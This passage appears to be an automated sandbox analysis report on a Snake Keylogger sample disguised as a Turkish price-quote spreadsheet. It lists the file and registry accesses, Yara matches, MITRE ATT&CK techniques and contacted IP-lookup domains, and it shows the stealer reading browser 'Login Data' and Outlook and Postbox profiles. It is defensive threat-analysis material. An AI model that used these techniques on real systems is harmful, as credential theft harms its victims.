Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4109948122.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4109948122.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 6308, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4109948122.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4109948122.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 6308, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	13 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	39%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeStealer
ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.fontbureau.com	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
checkip.dyndns.com	132.226.247.73	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersG	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://reallyfreegeoip.org	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
